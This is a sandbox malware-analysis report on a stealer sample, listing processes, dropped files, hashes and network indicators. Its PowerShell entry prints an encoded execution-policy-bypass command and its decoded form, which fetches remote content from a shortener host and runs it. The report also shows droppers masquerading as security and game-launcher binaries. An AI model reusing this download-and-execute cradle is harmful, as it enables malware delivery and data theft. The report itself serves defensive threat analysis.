File name:

test.exe

Full analysis: https://app.any.run/tasks/c975dd9b-3369-4082-9066-9c3acbfcddd5
Verdict: Malicious activity
Threats:

Stealers are a category of malicious software intended to gain unauthorized access to users' information and transfer it to the attacker. The stealer category includes programs that each focus on a particular kind of data, such as files, passwords, and cryptocurrency. Stealers can also spy on their targets by recording keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: April 29, 2025, 18:53:31
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stealer
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

098F6BCD4621D373CADE4E832627B4F6

SHA1:

A94A8FE5CCB19BA61C4C0873D391E987982FBBD3

SHA256:

9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08

SSDEEP:

3:Hn:Hn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7492)
    • Executing a file with an untrusted certificate

      • DistributedBlade58.exe (PID: 8168)
      • DistributedBlade58.exe (PID: 7304)
    • Actions looks like stealing of personal data

      • MSLauncher.exe (PID: 7288)
  • SUSPICIOUS

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 7492)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7492)
      • DistributedBlade58.exe (PID: 8168)
      • DistributedBlade58.exe (PID: 7304)
    • Starts itself from another location

      • DistributedBlade58.exe (PID: 8168)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 7492)
  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 7492)
    • Disables trace logs

      • powershell.exe (PID: 7492)
    • The executable file from the user directory is run by the Powershell process

      • DistributedBlade58.exe (PID: 8168)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7492)
    • Creates files in the program directory

      • DistributedBlade58.exe (PID: 8168)
    • Reads the computer name

      • DistributedBlade58.exe (PID: 8168)
      • 360Tray.exe (PID: 7264)
      • MSLauncher.exe (PID: 7288)
      • DistributedBlade58.exe (PID: 7304)
    • Checks supported languages

      • DistributedBlade58.exe (PID: 8168)
      • DistributedBlade58.exe (PID: 7304)
      • MSLauncher.exe (PID: 7288)
      • 360Tray.exe (PID: 7264)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7492)
    • Creates files or folders in the user directory

      • DistributedBlade58.exe (PID: 7304)
    • Create files in a temporary directory

      • DistributedBlade58.exe (PID: 7304)
      • 360Tray.exe (PID: 7264)
    • Reads the machine GUID from the registry

      • MSLauncher.exe (PID: 7288)
    • The sample compiled with chinese language support

      • DistributedBlade58.exe (PID: 7304)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
135
Monitored processes
9
Malicious processes
4
Suspicious processes
0

Behavior graph

Processes in the graph, start node first (labels as in the report): powershell.exe, conhost.exe (no specs), sppextcomobj.exe (no specs), slui.exe (no specs), distributedblade58.exe, distributedblade58.exe, mslauncher.exe, 360tray.exe (no specs), svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 7264
CMD: "C:\Users\admin\AppData\Roaming\PoFirefox\360Tray.exe" "C:\Users\admin\AppData\Roaming\PoFirefox\360Tray.exe" /onui
Path: C:\Users\admin\AppData\Roaming\PoFirefox\360Tray.exe
Parent process: DistributedBlade58.exe
User:
admin
Company:
360.cn
Integrity Level:
MEDIUM
Description:
360安全卫士 安全防护中心模块
Exit code:
0
Version:
12, 0, 0, 1761
Modules
Images
c:\windows\syswow64\input.dll
c:\users\admin\appdata\roaming\pofirefox\360tray.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID: 7288
CMD: C:\Users\admin\AppData\Local\Temp\MSLauncher.exe
Path: C:\Users\admin\AppData\Local\Temp\MSLauncher.exe
Parent process: DistributedBlade58.exe
User:
admin
Company:
Blizzard Entertainment
Integrity Level:
MEDIUM
Description:
Battle.net Launcher
Version:
2.34.0.14907
Modules
Images
c:\users\admin\appdata\local\temp\eea194.tmp
c:\users\admin\appdata\local\temp\mslauncher.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID: 7304
CMD: C:\ProgramData\PoFirefox\DistributedBlade58.exe
Path: C:\ProgramData\PoFirefox\DistributedBlade58.exe
Parent process: DistributedBlade58.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\programdata\pofirefox\distributedblade58.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
PID: 7492
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -enc KABJAG4AdgBvAGsAZQAtAHcAZQBiAHIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAJwBoAHQAdABwAHMAOgAvAC8AcwBoAG8AcgB0AGUAcgAuAG0AZQAvAFUAMgBEAEIAegAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AYwBvAG4AdABlAG4AdAAgAHwAaQBlAHgA
Decoded -enc argument (base64 of UTF-16LE): (Invoke-webrequest -URI 'https://shorter.me/U2DBz' -UseBasicParsing).content |iex
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7500
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7704
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
PID: 7736
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
PID: 8168
CMD: "C:\Users\admin\AppData\Local\Temp\Package\DistributedBlade58.exe"
Path: C:\Users\admin\AppData\Local\Temp\Package\DistributedBlade58.exe
Parent process: powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\package\distributedblade58.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
Total events
5 872
Read events
5 872
Write events
0
Delete events
0

Modification events

No data
Executable files
10
Suspicious files
13
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 7492 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_21hqh5fa.hwb.ps1 | Type: text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 7492 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xkzfhql4.izl.psm1 | Type: text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 7492 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10c1bb.TMP | Type: binary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
PID: 7492 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JBXXCQYXJIHWRO6AX69V.temp | Type: binary
MD5:B63A01B62C49A86FDD2DC3152C7B424D
SHA256:764428F5EED6968E0C08B5462517C9F1567A8DF67A658382EFAFFF40479F56EB
PID: 7304 | Process: DistributedBlade58.exe | Filename: C:\Users\admin\AppData\Local\Temp\EEA194.tmp | Type: (not given)
MD5:
SHA256:
PID: 7492 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\Package\DistributedBlade58.exe | Type: executable
MD5:9E90C7BA64A66D9AB4703AF006540193
SHA256:A519304C3BBA23EAE2045A85E01AAE44E6556B2F787966654B7209DB13CFA0C4
PID: 8168 | Process: DistributedBlade58.exe | Filename: C:\ProgramData\PoFirefox\Maik.xt | Type: binary
MD5:ACE46038DC3BF9FB1E177950555CF701
SHA256:B7570587305E05D79B85FF769A9FD46723B68E0C7ECA2DD87AF4AC1BC6B0C6D3
PID: 7492 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\Package\Klaind.xntj | Type: binary
MD5:9E9DF19271265E7E5CB5029DFB55ED30
SHA256:4F3460ADCCB48170B0E7A47ECD1AC74654E5DC4EDB34C8759D9D5521357F98D0
PID: 8168 | Process: DistributedBlade58.exe | Filename: C:\ProgramData\PoFirefox\IconX.dll | Type: executable
MD5:D2DBDD831DDCE917D58571E0FD70A742
SHA256:0F4AF1600462AA57259FD9D935E2DBB5CA22336CF6515F4A390B04CD5DA7955F
PID: 7492 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Local\Temp\Package\dx0.dll | Type: executable
MD5:693DFBB9B324E80B70660927CA1DEA69
SHA256:7C28D90E3484B566EE00ADAB4679A3D1C51F86F01560035D86C8F7788AC05234
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
22
DNS requests
15
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
Method: GET | HTTP code: 200 | IP: 2.16.241.19:80 | URL: http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | CN: unknown | Reputation: whitelisted

Method: GET | HTTP code: 200 | IP: 23.219.150.101:80 | URL: http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | CN: unknown | Reputation: whitelisted

PID: 6544 | Process: svchost.exe | Method: GET | HTTP code: 200 | IP: 2.23.77.188:80 | URL: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | CN: unknown | Reputation: whitelisted

PID: 668 | Process: SIHClient.exe | Method: GET | HTTP code: 200 | IP: 23.219.150.101:80 | URL: http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | CN: unknown | Reputation: whitelisted

PID: 668 | Process: SIHClient.exe | Method: GET | HTTP code: 200 | IP: 23.219.150.101:80 | URL: http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | CN: unknown | Reputation: whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
IP: 20.73.194.208:443 | Domain: settings-win.data.microsoft.com | ASN: MICROSOFT-CORP-MSN-AS-BLOCK | CN: NL | Reputation: whitelisted

PID: 4 | Process: System | IP: 192.168.100.255:138 | Reputation: whitelisted

IP: 2.16.241.19:80 | Domain: crl.microsoft.com | ASN: Akamai International B.V. | CN: DE | Reputation: whitelisted

IP: 23.219.150.101:80 | Domain: www.microsoft.com | ASN: AKAMAI-AS | CN: CL | Reputation: whitelisted

PID: 3216 | Process: svchost.exe | IP: 172.211.123.250:443 | Domain: client.wns.windows.com | ASN: MICROSOFT-CORP-MSN-AS-BLOCK | CN: FR | Reputation: whitelisted

PID: 7492 | Process: powershell.exe | IP: 188.114.96.3:443 | Domain: shorter.me | ASN: CLOUDFLARENET | CN: NL | Reputation: malicious

PID: 6544 | Process: svchost.exe | IP: 20.190.159.4:443 | Domain: login.live.com | ASN: MICROSOFT-CORP-MSN-AS-BLOCK | CN: IE | Reputation: whitelisted

PID: 6544 | Process: svchost.exe | IP: 2.23.77.188:80 | Domain: ocsp.digicert.com | ASN: AKAMAI-AS | CN: DE | Reputation: whitelisted

PID: 2104 | Process: svchost.exe | IP: 20.73.194.208:443 | Domain: settings-win.data.microsoft.com | ASN: MICROSOFT-CORP-MSN-AS-BLOCK | CN: NL | Reputation: whitelisted

PID: 4 | Process: System | IP: 192.168.100.255:137 | Reputation: whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 2.16.241.19
  • 2.16.241.12
whitelisted
www.microsoft.com
  • 23.219.150.101
whitelisted
google.com
  • 172.217.18.110
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
shorter.me
  • 188.114.96.3
  • 188.114.97.3
malicious
marinescoatsnow.click
  • 188.114.96.3
  • 188.114.97.3
unknown
login.live.com
  • 20.190.159.4
  • 40.126.31.73
  • 40.126.31.129
  • 20.190.159.71
  • 40.126.31.128
  • 20.190.159.130
  • 20.190.159.0
  • 40.126.31.67
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted

Threats

No threats detected
No debug info